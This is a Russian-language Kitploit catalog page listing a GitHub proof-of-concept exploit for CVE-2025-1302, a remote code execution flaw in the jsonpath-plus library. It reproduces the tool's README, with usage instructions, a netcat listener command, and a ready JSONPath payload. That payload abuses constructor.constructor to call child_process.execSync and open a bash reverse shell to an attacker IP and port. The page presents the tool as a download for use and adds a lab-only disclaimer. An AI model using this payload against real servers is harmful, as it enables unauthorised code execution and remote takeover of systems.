Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-1302_jsonpath-plus_RCE — PoC эксплойт и демонстрация уязвимого сервера для CVE-2025-1302 в jsonpath-plus. | Kitploit
Инструменты/GitHubGitHub/abrewer251/cve-2025-1302_jsonpath-plus_rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHub
abrewer251/cve-2025-1302_jsonpath-plus_rce

CVE-2025-1302_jsonpath-plus_RCE

PoC эксплойт и демонстрация уязвимого сервера для CVE-2025-1302 в jsonpath-plus.

Репозиторий
191 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-1302 JSONPath-Plus RCE PoC

Название скрипта PoC: poc.py

Скрипт эксплойта Proof-of-Concept для CVE-2025-1302, который нацелен на уязвимость RCE в библиотеке jsonpath-plus. При запуске против уязвимой конечной точки сервиса скрипт пытается инициировать удаленное выполнение кода через полезную нагрузку JSONPath и установить обратную оболочку обратно к атакующему.


Возможности

  • Гибкие HTTP-методы: поддерживает POST, GET или AUTO (POST с резервным GET) через флаги --method или --no-fallback.
  • Пользовательские полезные нагрузки: загрузите один или несколько шаблонов полезных нагрузок RCE JSONPath из файла с шаблонами {ip} и {port}.
  • Встроенная полезная нагрузка по умолчанию: если файл полезной нагрузки не указан, используется полностью сформированный шаблон обратной оболочки bash.
  • Подробная отладка: выводит полные тела запросов/ответов как для POST, так и для GET попыток при их неудаче.
  • Индикаторы прогресса: отображает циклы задержки и полезной нагрузки с индикаторами выполнения tqdm.
  • Логирование: опционально сохраняет все результаты в JSON-файл с помощью --output.

Установка

  1. Клонируйте этот репозиторий:

    git clone https://github.com/yourorg/jsonpath-rce-poc.git
    cd jsonpath-rce-poc
    
  2. Установите зависимости (требуется Python 3.6+):

    pip install -r requirements.txt
    

Использование

  1. Запустите слушатель на вашей атакующей машине (замените порт при необходимости):

    nc -lvnp 9999
    
  2. Запустите PoC:

    python3 poc.py \
      --url http://TARGET_HOST:PORT/query \
      --ip ATTACKER_IP --port 9999 \
      [--payload-file payloads.txt] \
      [--delay 5] \
      [--method AUTO|POST|GET] \
      [--no-fallback] \
      [--output results.json]
    
  • --payload-file: Файл, содержащий одну полезную нагрузку JSONPath на строку. Используйте плейсхолдеры {ip} и {port}.
  • --delay: Секунды ожидания перед отправкой полезных нагрузок (показывает обратный отсчет).
  • --method: Принудительный выбор POST, GET или AUTO (по умолчанию).
  • --no-fallback: Сокращение для пропуска любых повторных попыток GET (эквивалентно --method POST).
  • --output: Путь для сохранения JSON-лога попыток.

Пример файла полезной нагрузки

$[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]

Вклад

  1. Форкните репозиторий и создайте ветку для функции.
  2. Отправьте pull request с вашими изменениями.

Отказ от ответственности

Используйте этот скрипт только в контролируемых лабораторных средах против систем, которыми вы владеете или на тестирование которых имеете явное разрешение. Злоупотребление может быть незаконным и неэтичным.

Скачать инструмент